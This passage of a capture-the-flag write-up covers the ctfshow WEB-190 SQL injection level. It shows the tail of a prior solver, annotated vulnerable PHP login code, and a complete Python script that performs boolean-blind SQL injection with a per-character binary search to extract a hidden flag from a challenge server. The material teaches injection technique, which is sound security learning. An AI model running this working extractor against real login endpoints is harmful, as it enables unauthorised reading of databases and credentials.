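    flag = ''
    for pos in range(int(num), int(num) + FLAG_LEN):
        for ch in CHARSET:
            if not oracle(build_char_probe(pos, ch)):   # "differs" is false -> this is the byte
                flag += ch
                print(flag)
                break
        else:
            print("byte at offset {} is outside CHARSET - stopping".format(pos))
            break
    return flag


if __name__ == "__main__":
    getFlag(getIndex())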

WEB-190

  //The username is interpolated inside single quotes this time - but there is no filter at all (the TODO below is the missing waf()),
  //so the textbook `admin' and COND#` closes the literal, appends a condition and comments out the trailing quote.
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //Password must be numeric; the payload sends 123 as a deliberately wrong password.
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //As in WEB-189 the oracle is the failure path: admin row found + wrong password gives "密码错误", no row gives a different message.
  //The payload binary-searches each character's ASCII code with that boolean.
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

  //TODO: feels like something is missing here, odd (original author's note - the missing piece is the waf() every earlier level had)

payload (no filter at all: classic `admin' and if(...)#`, with a per-character binary search over the ASCII range using the "wrong password" vs "no such user" messages as the oracle — about 7 requests per character instead of one per candidate):

import requests

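# WEB-190 - boolean-based blind extraction with a per-character binary search.
# The username is quoted but there is no filter at all, so the textbook
# `admin' and COND#` works. When COND holds the admin row is returned and the
# wrong password (123) yields "密码错误"; otherwise no row is found and the message
# differs - that is the oracle. ascii() of each character is binary-searched in
# 7 requests instead of one request per candidate character.
url  = 'http://5a06a32e-8ee9-4c40-bbb7-de12a6c92342.challenge.ctf.show/api/'
data = {'username':'','password':123}
flag = ''
TARGET = "select concat(f1ag) from ctfshow_fl0g"   # must yield a single row, or the scalar subquery errors out
WRONG_PASSWORD = '密码错误'
MAX_LEN = 45
TIMEOUT = 10


def build_probe(pos, mid, target=TARGET):
    """Username asserting that ascii(character `pos` of `target`) > `mid`; the trailing `#` drops the closing quote."""
    return f"admin' and if(ascii(substr(({target}),{pos},1))>{mid},1,2)=1#"


def _http_oracle():
    """Oracle against the live target: True when the server answers 'wrong password', i.e. the condition held."""
    sess = requests.Session()   # connection reuse across the ~300 probes

    def oracle(username):
        data['username'] = username
        res = sess.post(url, data=data, timeout=TIMEOUT)
        return WRONG_PASSWORD in res.json()['msg']
    return oracle


def extract_char(pos, oracle):
    """Binary-search the ASCII code (0..127) of character `pos` and return it.

    The lower bound is 0 rather than the original's 32 so that running off the
    end is detectable: ascii('') is 0 and a NULL comparison is never true, so
    both converge to 0, whereas the original turned the end of the string into
    a run of spaces. Bytes above 127 would be reported as 127."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_probe(pos, mid)):   # code > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle=None, max_len=MAX_LEN):
    """Recover up to `max_len` characters of TARGET and return them; stops at the end of the string."""
    oracle = oracle or _http_oracle()
    found = ''
    for pos in range(1, max_len + 1):
        code = extract_char(pos, oracle)
        if code == 0:
            break   # end of the string (or the subquery returned NULL)
        found += chr(code)
        print(found)
    return found


if __name__ == '__main__':
    flag = extract()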